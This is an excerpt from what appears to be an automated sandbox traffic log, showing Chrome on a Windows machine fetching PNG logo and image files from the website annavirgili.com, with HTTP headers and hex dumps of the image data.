                                                                                                          2024-12-12 11:58:17 UTC440INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 00 01 3e 49 44 41 54 78 da a4 93 3d 4e c3 40 10 85 bf 8d 6d 40 0a 24 82 22 4d 4a 3a 84 c4 55 10 34 dc 06 ae 43 01 9c 24 05 a2 46 10 c4 9f 28 42 62 13 67 7f ec 1d 8a 58 71 0c 76 a4 28 23 ad 76 46 a3 7d fb 66 e6 8d 12 11 36 31 05 6c 01 bb c5 bd 8e 59 e0 27 04 ba 67 77 57 5f 7f b3 37 a7 97 95 f8 fd fc e2 1f 42 ff f6 ba 17 02 ed dc e7 9c f4 0e 57 7e b7 75 7c 54 50 56 08 82 b9 7f 00 68 87 40 e0 7c 46 62 53 46 3a 69 04 c8 86 2f 0b 3f 38 d8 47 9c 03 08 42 00 e3 1c 13 3d
                                                                                                          Data Ascii: PNGIHDRapHYs cHRMz%u0`:o_F>IDATx=N@m@$"MJ:U4C$F(BbgXqv(#vF}f61lY'gwW_7BW~u|TPVh@|FbSF:i/?8GB=


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          48192.168.2.2449822147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:16 UTC626OUTGET /wp-content/uploads/2021/09/logo.pnbianco.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:17 UTC246INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:17 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 15 Sep 2021 15:18:18 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 78597
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0c a4 00 00 05 6c 08 06 00 00 00 bc 2c a4 f8 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e5 09 0f 0f 11 14 9d 71 e2 e6 00 00 20 00 49 44 41 54 78 da ec dd df 75 64 37 92 27 e0 88 71 80 f4 80 1c 0b 98 1e 10 6d 41 d7 5a 30 5a 0b 56 1e 74 8d 05 ab b5 60 d5 16 4c af 05 03 7a 90 b4 60 48 0f 48 0b b0 0f ca 3e 47 a3 3f 55 24 32 49 00 f7 7e df 39 7a 52 a1 0a 19 81 8b 7c b9 bf 8c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: PNGIHDRl,bKGDpHYs.#.#x?vtIMEq IDATxud7'qmAZ0ZVt`Lz`HH>G?U$2I~9zR|
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 84 40 0a 00 00 00 00 c0 6d aa 9d 75 4d eb 30 27 4b e8 bd 15 c3 3c 38 f3 7f 9c a1 8e 9a e3 29 84 04 00 00 00 00 c0 0d 10 48 01 00 00 00 00 b8 4d b5 b3 ae 69 1d 5f 12 11 ef c5 ad 18 33 38 4c b2 0e 01 85 c5 ce fc 33 6e d1 b2 d7 00 00 00 00 00 37 e4 bf 68 01 00 00 00 00 c0 4d ea fd 50 bd 6d b5 80 cc 7c 2c a5 3c da 8a a9 bc 9f c2 24 5b 28 6e 55 a1 00 00 20 00 49 44 41 54 68 a5 94 7f d2 d2 a1 6a 99 23 44 d6 4a 29 ff cb 76 0c f5 dc 31 3b 43 df 11 00 00 00 00 00 cc 4f 20 05 00 00 00 00 e0 c6 64 e6 a1 94 72 d7 51 fa 16 11 9f 1b fc fc ef 4a 29 7f 28 a5 3c d8 8d 29 e7 e3 a3 94 f2 5d 44 7c 7f e6 3f d5 8a 40 ca 68 75 86 45 44 44 cb 4c bb 31 c1 d9 1f 11 af 17 9e 9d a6 d3 00 00 00 00 00 b7 e3 77 5a 00 00 00 00 00 70 73 6a 67 dd eb 39 3f 34 33 ef 33 f3 b5 fc ed a6 04 61
                                                                                                          Data Ascii: @muM0'K<8)HMi_38L3n7hMPm|,<$[(nU IDAThj#DJ)v1;CO drQJ)(<)]D|?@huEDDL1wZpsjg9?433a
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 8b 97 8f 1b 6e c5 99 a4 47 e0 19 ad 9f bc 30 18 42 26 b2 6e a8 15 5c b9 d4 c3 00 f3 95 52 ba 8c be 4e 64 3a 76 4a ca 2c d7 4a 1f 62 fb ee 7b ea c9 28 5f 53 4a de d1 b3 cf 39 ff 21 ea 9d bc f8 57 07 7a 1b 98 20 09 a1 d0 a6 3b 5d d0 f4 fa f3 26 a5 34 a4 94 3e 44 c4 7f 45 c4 ef b1 2d 52 fa 52 82 ca 75 44 7c 2d ff ce ff 49 29 9d d5 de 4b 49 48 81 11 94 97 72 3d 6d 08 07 a3 0a b3 b4 71 42 12 c0 8b 8e 73 ce e6 88 e1 0a 00 00 20 00 49 44 41 54 97 ba 01 60 12 7a 2a a6 b0 88 dd 7c cc 06 1a 54 aa ff b6 7c 0a da 89 51 64 02 6a 3d 67 af 4b 75 7c 00 ec 4f 7b b2 34 a4 b3 b3 8e 6d 41 a6 29 bb 4e 29 29 ac c9 14 f6 e8 9b d8 06 02 02 cc 6d fe 53 40 14 da 74 d7 d0 bd 9a 67 9e 9f 87 d7 29 a5 65 4a e9 24 a5 f4 21 a5 94 22 e2 ff 44 c4 7f 96 7f fe 6f fa 87 93 94 d2 45 f9 77 76
                                                                                                          Data Ascii: nG0B&n\RNd:vJ,Jb{(_SJ9!Wz ;]&4>DE-RRuD|-I)KIHr=mqBs IDAT`z*|T|Qdj=gKu|O{4mA)N))mS@tg)eJ$!"DoEwv
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: b0 11 30 1b 01 da 08 86 8d 00 39 02 e3 08 2c 47 30 38 02 6b 22 58 26 82 d5 44 60 88 e0 40 04 07 22 a8 fb 87 1a 9b f5 0e 20 40 2d 75 55 bf ef f3 f8 f1 9e 7b c7 1a 75 75 a9 fa ab ea fa be 82 16 f4 95 57 67 69 b7 f2 ff 27 d5 d7 80 2d 8d 97 cb d4 5d 8d f2 25 2b c9 ca 8c 59 bf 71 45 61 08 5a 70 e6 14 3f 60 83 d8 f3 26 c9 d7 4a bf fe e8 12 b9 4b 29 a7 03 c4 11 b7 7d c5 7a 00 d8 95 79 ea 5e c7 bf 34 17 9a b4 16 e3 a6 99 db 0a 00 00 30 4d 12 52 78 b7 be c2 db 89 96 a0 11 e7 9a 00 77 de a7 0b 00 00 20 00 49 44 41 54 78 94 94 d2 aa 1f fb d3 cd 00 de 3b 5e 9e a7 de 8d 81 2f 39 88 8d 01 98 bb 80 fe 0c 8c 49 ad c5 15 c6 98 78 37 77 7f 00 a8 5d 03 27 f8 1e 24 b9 74 27 27 6b d5 e0 35 d9 33 02 00 00 30 51 12 52 d8 06 9b 06 68 c9 81 4d da 40 f2 c7 cb ac 1f 1a be c4 8b 3e
                                                                                                          Data Ascii: 09,G08k"X&D`@" @-uU{uuWgi'-]%+YqEaZp?`&JK)}zy^40MRxw IDATx;^/9Ix7w]'$t''k530QRhM@>
                                                                                                          2024-12-12 11:58:17 UTC13061INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 0e 01 da 00 00 20 00 49 44 41 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: ( IDAT


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          49192.168.2.2449821147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:16 UTC617OUTGET /wp-content/uploads/2021/08/logo.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:17 UTC246INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:17 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 14:34:53 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 80326
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0c a4 00 00 05 6c 08 06 00 00 00 bc 2c a4 f8 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e5 08 0a 0e 20 20 71 e4 a2 54 00 00 20 00 49 44 41 54 78 da ec dd d1 71 2c 47 96 1e e0 93 13 7a 07 3c 00 d6 02 b4 07 c8 b5 60 e8 c1 dc b1 40 94 05 a2 2c d0 8c 05 e2 58 20 ae 05 4a 78 00 58 20 c0 82 45 5b 70 f4 30 cd d8 11 77 48 a2 b3 ab 3b b3 aa be 2f 62 63 23 86 c8 8b ec 73 4e 65 bf d4 8f 2c 99 19 00 00 00 00 00 00 00 00 00 00 00 00 f0 55 7f 50 02 00 00 00 00 00 00 00 00 00 00 00 00 ce 21 90 02 00 00 00 00 00 00 00 00 00 00 00 c0 59 04 52 00 00 00 00 00 00 00 00 00 00 00 00 38 8b 40 0a 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: PNGIHDRl,bKGDpHYs.#.#x?vtIME qT IDATxq,Gz<`@,X JxX E[p0wH;/bc#sNe,UP!YR8@
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: ae 4e 20 05 00 00 00 00 60 72 a5 94 db 88 b8 eb 28 fd c8 4c b7 60 f0 25 4f 5a 30 5c 9d 64 1d cd 56 2c 3d 0b bd b5 de 11 00 00 00 00 00 74 13 48 01 00 00 00 00 98 5f ed ac f3 a1 31 5f d3 b4 60 d9 e7 db 2c 6c cf 5d 29 e5 fe ca 73 64 df 01 00 00 00 00 e8 26 90 02 00 00 00 00 30 bf da 59 d7 b4 8e af 10 5a 1a ef 30 c3 22 32 f3 3d 22 de df c1 bb 59 00 00 20 00 49 44 41 54 6c c7 7a e7 fd 09 b7 68 bd 65 e6 ab 96 03 00 00 00 00 d0 4b 20 05 00 00 00 00 60 7e b5 b3 ae 69 1d 66 64 7a a7 dc 8a 61 1e b6 a7 27 a0 e4 1d 01 00 00 00 00 c0 10 02 29 00 00 00 00 00 f3 7b e8 29 ca cc a6 75 7c 65 46 de 23 e2 45 27 86 ab 93 ac c3 99 b1 e6 2c f4 ce 8f 1b 92 00 00 00 00 00 38 89 40 0a 00 00 00 00 c0 c4 4a 29 b5 b3 f4 49 f7 f8 46 3e 4a 1f ef 60 16 38 7a 28 a5 dc 7e b2 a6 f7 3d d1
                                                                                                          Data Ascii: N `r(L`%OZ0\dV,=tH_1_`,l])sd&0YZ0"2="Y IDATlzheK `~ifdza'){)u|eF#E',8@J)IF>J`8z(~=
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: ab 0a a0 09 57 d1 df 06 e5 95 71 1b cf 69 24 18 25 42 30 0a 75 e6 e5 82 52 f8 6a a3 0a 00 60 6f 66 b5 b6 fa ca be ab 5f 52 4a db b1 f6 75 a7 94 ce 52 4a db 88 f8 e5 3b ff c9 cf e5 7e 26 45 40 0a b3 55 16 eb 4e 1b bd 7d 1b d4 e1 5f 7f 13 bd 2e 30 fd 21 08 8d 16 27 09 65 53 16 ed 4c 8e 5a 77 14 16 99 69 b3 bf b4 01 8e 39 5a 36 7a df a7 36 fd 00 2f 58 75 50 86 33 cd c8 94 94 d3 cd 6b 71 3a ca f4 6c 55 01 cd 4c d6 58 00 00 20 00 49 44 41 54 30 b6 b2 41 f9 a2 f4 fb bd 58 44 c4 a0 75 f9 cb b8 a9 95 60 94 9f 05 a3 50 b9 cf 5f 1e a0 cf ff a4 f6 61 16 ee dc 2f 80 be e6 95 7d 57 47 11 f1 3f 29 a5 4d 4a 69 f9 a3 49 75 53 4a 3f 95 3f 77 17 11 ff 53 ae f7 bd 79 d5 24 d7 05 04 a4 30 67 ab 86 ef fd dc 46 18 f8 a7 97 fd 63 44 ac 3b 2e e2 3a a5 64 31 8b 9a bf 21 0b 12 f3
                                                                                                          Data Ascii: Wqi$%B0uRj`of_RJuRJ;~&E@UN}_.0!'eSLZwi9Z6z6/XuP3kq:lULX IDAT0AXDu`P_a/}WG?)MJiIuSJ??wSy$0gFcD;.:d1!
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 66 05 00 00 a0 86 7f 53 05 b3 67 53 01 ad 58 84 45 60 98 a5 9c f3 26 22 7e ee b8 88 43 4a c9 26 6b 60 0c 17 b1 cb be df a3 93 94 d2 a0 89 e9 41 09 b6 3d 52 13 34 62 99 52 fa 49 35 00 af cc db 87 46 c7 a1 2d ae 37 d6 b8 df 2f 4e c3 02 60 a4 31 c1 75 44 dc 36 5c 84 cb 92 cc 11 a2 04 2d 77 b7 d6 5a 4e da 06 ea ba 57 05 00 00 cc 8d 80 94 19 2b 8b 0d b2 60 d0 12 01 54 30 53 65 73 cb 4d a7 c5 5b 44 c4 da 46 3f 60 84 be f2 31 76 41 29 4f 9d 16 f1 32 a5 64 3c 88 79 0d ec 7f ac 7a a0 0d d7 f0 00 00 20 00 49 44 41 54 a1 1a 80 37 18 bc 97 9b bd df 6b 8f 2f 00 23 6a 7d 6d ea ba 9c 48 06 11 7d 9e 92 22 41 1a d4 f7 a8 0a 00 00 98 1b 01 29 f3 66 13 0c ad 39 92 b5 05 e6 2b e7 bc 8c 7e 33 ca 1c 45 c4 5a 2b 03 23 f4 95 77 d1 f7 a9 72 7f 18 0f d2 b2 b2 a9 e5 54 4d d0 18 eb
                                                                                                          Data Ascii: fSgSXE`&"~CJ&k`A=R4bRI5F-7/N`1uD6\-wZNW+`T0SesM[DF?`1vA)O2d<yz IDAT7k/#j}mH}"A)f9+~3EZ+#wrTM
                                                                                                          2024-12-12 11:58:17 UTC14790INData Raw: 00 00 00 00 00 00 00 00 00 00 80 9d 08 48 01 00 00 00 00 00 00 00 00 00 00 00 60 27 02 52 00 00 00 00 00 00 00 00 00 00 00 00 d8 89 80 14 00 00 00 00 00 00 00 00 00 00 00 00 76 22 20 05 00 00 00 00 00 00 00 00 00 00 00 80 9d 08 48 01 00 00 00 00 00 00 00 00 00 00 00 60 27 02 52 00 00 00 00 00 00 00 00 00 00 00 00 d8 89 80 14 00 00 00 00 00 00 00 00 00 00 00 00 76 22 20 05 00 00 00 00 00 00 00 00 00 00 00 80 9d 08 48 01 00 00 00 00 00 00 00 00 00 00 00 60 27 02 52 00 00 00 00 00 00 00 00 00 00 00 00 d8 89 80 14 00 00 00 00 00 00 00 00 00 00 00 e5 7a d4 6c 00 00 20 00 49 44 41 54 00 76 22 20 05 00 00 00 00 00 00 00 00 00 00 00 80 9d 08 48 01 00 00 00 00 00 00 00 00 00 00 00 60 27 02 52 00 00 00 00 00 00 00 00 00 00 00 00 d8 89 80 14 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: H`'Rv" H`'Rv" H`'Rzl IDATv" H`'R


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          50192.168.2.2449827147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:17 UTC656OUTGET /wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:17 UTC247INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:17 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 04 Sep 2024 07:30:46 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 336687
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 02 00 00 02 94 08 03 00 00 00 a9 11 6a e3 00 00 05 01 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 27 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 27 3e 0a 20 20 20 20 20 20 20 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 20 72 64 66 3a 61 62 6f 75 74 3d 27 27 0a 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 64 63 3d 27 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 65 6c 65 6d 65
                                                                                                          Data Ascii: PNGIHDRjiTXtXML:com.adobe.xmp<x:xmpmeta xmlns:x='adobe:ns:meta/'> <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'> <rdf:Description rdf:about='' xmlns:dc='http://purl.org/dc/eleme
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: c4 c4 4e 61 28 ee f0 f9 02 3e 2e 2a 78 ea 05 a5 c0 82 11 42 02 b7 ab 39 7c 62 6e 75 3c 37 07 90 d4 01 e3 e9 3e 41 a2 a6 92 88 64 71 51 d1 2a c5 3d 3d 64 49 a0 12 01 06 a5 2c e0 e9 60 97 b8 5a bb d8 e9 b3 0b 07 37 bf fe b1 67 6b 39 ce 10 30 8f 7e 40 4f cb d4 74 3c 8c 62 20 11 f1 57 14 e0 51 e9 02 18 88 45 82 6c 18 4a d7 42 50 2e d8 c9 66 21 d2 f6 10 e4 01 0c 01 b7 ef df 26 04 60 ec 09 06 bb 27 28 ba c5 41 7f e4 54 55 45 e9 3e be cc e6 bd 30 fe 35 d0 49 dd e0 b5 b5 b5 d9 06 50 2b 10 fd 41 14 04 c4 9f 88 f0 2f e8 9b e8 b0 96 ef db b3 b7 14 6a 61 4c 0e 1b 43 21 9c f4 76 c2 80 10 a1 c0 51 a3 e1 23 4b 79 15 a5 02 d5 16 cc 07 11 0d 40 51 d0 88 d6 21 e6 04 09 65 88 06 0c f0 12 c4 54 2a 15 81 71 90 6a db e1 1e ed 7b 54 03 33 7e bf db cd 0e a6 35 02 26 f5 cf 57 2e
                                                                                                          Data Ascii: Na(>.*xB9|bnu<7>AdqQ*==dI,`Z7gk90~@Ot<b WQElJBP.f!&`'(ATUE>05IP+A/jaLC!vQ#Ky@Q!eT*qj{T3~5&W.
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 7f ae 14 ac bc 04 cc 4a 1f 8e 0d 10 11 82 76 ee 05 94 89 f5 3f 27 47 83 97 f9 84 3c d0 c2 a9 e2 15 f4 61 01 73 c0 1e 91 5d 36 15 b0 70 e2 98 e5 04 3d 6a a1 07 aa ae 71 94 0b 23 80 9a 1a 6f 0d f6 5a dd 26 18 5f bb 4d 50 ad f2 56 10 91 ff 5a 9e 02 9a 8d f4 2c 4e 3d 8e bf a1 d2 c0 8f 4a 83 c9 dc 60 e1 3e c7 bd 04 43 c0 c6 ab e5 a7 83 1d b8 34 91 ea 2d cf e4 98 01 b4 c9 14 60 1c f7 bf e0 02 e9 7e c0 38 83 80 58 19 ba 30 b7 fa 0b 42 00 82 80 a1 37 af a9 0c 48 7e dc 75 32 0a 75 30 9b 8c 5c 15 df d8 87 b7 be 3e 78 87 0a 53 e1 41 f5 9b 8c 02 8a 6f 08 47 09 80 05 b0 3a 98 31 40 40 c0 03 d1 13 c4 64 50 58 09 8a 70 82 81 1e 44 95 0c 0c 80 c8 70 ea 18 56 1d e1 46 c6 79 05 bc 52 fc d9 5f 7f fb 2e 8c 02 76 16 e5 40 c0 be 03 7b f6 ef 82 30 a8 50 40 c0 de bd 06 c8 80 3b
                                                                                                          Data Ascii: Jv?'G<as]6p=jq#oZ&_MPVZ,N=J`>C4-`~8X0B7H~u2u0\>xSAoG:1@@dPXpDpVFyR_.v@{0P@;
                                                                                                          2024-12-12 11:58:18 UTC16384INData Raw: 7a 45 f4 a7 40 80 54 22 bc 0f 6b 3b 08 fb 75 b9 43 1d e1 bf a4 fa 52 89 89 89 44 38 9e ec 31 d9 c3 f1 70 20 e2 72 d3 f3 fe 28 74 7d 50 05 10 c0 70 74 c0 be a1 d8 50 8e 06 c0 3c 90 3d 42 fc bc f1 2f f2 83 b1 16 04 93 20 a8 04 1d 2e aa 25 5c 7e 37 e1 89 d5 1e 80 20 d8 ef 0b 59 a9 f0 b0 4b b6 7e 1f 01 80 51 92 6c 46 26 01 e0 0c 68 36 7b 3d 46 73 3b db 7e 9b eb a9 d0 1f 0c 0e 1a 83 4c dc b3 a1 87 d8 08 e6 0e a0 de 4c 35 be 00 00 91 7e 0b 23 a0 f6 5d 7b 0f b7 ec 16 01 38 7a 71 f8 79 2f a8 de 21 b5 62 4f a8 d3 06 e2 8f 4e 7b 90 4a 08 9b dd df d0 d0 d4 20 49 1d a6 26 87 c9 de 61 39 aa 62 00 f8 53 de e4 cd 39 7b 9d 56 c6 02 aa dd 80 63 32 1f 30 7c 7d f9 e7 bf 82 2a e0 dc fb 6b 2f 20 0d 9c e7 81 c0 5c fa 56 fc 49 c1 6e c0 f9 f3 42 16 74 7a 4c e4 0f 01 02 d0 0a 80
                                                                                                          Data Ascii: zE@T"k;uCRD81p r(t}PptP<=B/ .%\~7 YK~QlF&h6{=Fs;~LL5~#]{8zqy/!bON{J I&a9bS9{Vc20|}*k/ \VInBtzL
                                                                                                          2024-12-12 11:58:18 UTC16384INData Raw: 94 c3 55 ca dc 42 05 eb 00 f6 86 5f f6 26 19 a1 af 7c 1c cc 5f ed da 3f b2 d4 2a 40 37 2b 94 ad e3 08 5b 17 96 a7 27 00 02 70 99 99 cd 00 04 4c 5e 88 67 16 76 95 97 57 50 b1 50 79 be 32 b4 b8 3b e0 f5 92 00 dd 5b a0 2e 2e a0 24 0b 58 ef 20 2c 09 01 18 1f 2a 47 12 00 01 c9 91 b7 6f 9c 4b 63 11 a8 9d 41 00 9c d7 03 23 7f 57 fd 92 3f 81 91 df 1e 74 13 c9 a2 0b 13 fe 10 01 64 d6 22 0e 1f a7 63 00 0a 70 c6 b1 43 dc 16 88 4a 00 14 aa 2c a3 9c d8 8f 5a 5f 31 60 c7 f1 5f c2 2b 9e c7 85 33 39 40 28 10 82 8b 5f c2 31 40 a6 ca 42 1c 11 70 0f 48 2f 81 b4 04 b4 38 9c 4e 13 d2 7f cc 03 71 b7 90 1c 98 ca 01 31 11 a4 dd dd 84 08 20 e0 2d ef 45 16 d0 17 74 36 9a 50 0c dc ac d5 03 53 28 78 ce 0c c0 35 40 fc 0d d0 98 5f fd f3 a6 10 42 0a f8 ff 73 3f d3 ff 18 79 69 28 83 80
                                                                                                          Data Ascii: UB_&|_?*@7+['pL^gvWPPy2;[..$X ,*GoKcA#W?td"cpCJ,Z_1`_+39@(_1@BpH/8Nq1 -Et6PS(x5@_Bs?yi(
                                                                                                          2024-12-12 11:58:18 UTC16384INData Raw: 0c f2 de 4e 74 12 8d c5 78 da 43 80 ce c0 88 00 d8 50 60 07 66 c0 0b 7a 9b ce 46 32 20 71 7f 84 80 91 36 dc 15 0c b7 5f b5 ba d9 72 00 2c 02 72 6e 69 1a 90 7a 81 a8 1a 88 66 a1 1c 12 79 72 f2 3d 28 f7 ff 8a 1e 81 92 d8 87 7b eb 71 ed af 19 b8 bd 43 43 78 81 fd fe 1a aa 22 6a d0 56 f8 30 e2 80 3f c8 bd 8b 29 81 d9 af 0d 73 f0 17 9a b9 a8 33 90 4a 35 27 6b 9b 4d a9 9c c7 64 4a 79 3c a9 94 4d 53 1d d5 3a 3d bd 09 9f a9 59 c0 fe 24 64 2d bc c5 22 f0 fa a6 a0 00 ff 61 a6 a6 8e 6e 34 12 bd 8f 34 60 6a 0a 1b aa ad 78 fa 93 ed 35 44 9b 08 04 92 19 7e 49 87 90 48 03 44 0c 90 ea 82 94 0f 0c b3 14 40 64 00 e3 a8 04 00 01 98 47 3d 60 6c f5 bf d3 4f 17 96 96 ce 24 7a ba 2e 5d ba f4 c9 9d e5 ef d6 3e a4 21 a2 71 4a 07 28 a2 c7 91 e9 33 42 70 45 64 03 a7 db 5a dd 62 f6
                                                                                                          Data Ascii: NtxCP`fzF2 q6_r,rnizfyr=({qCCx"jV0?)s3J5'kMdJy<MS:=Y$d-"an44`jx5D~IHD@dG=`lO$z.]>!qJ(3BpEdZb
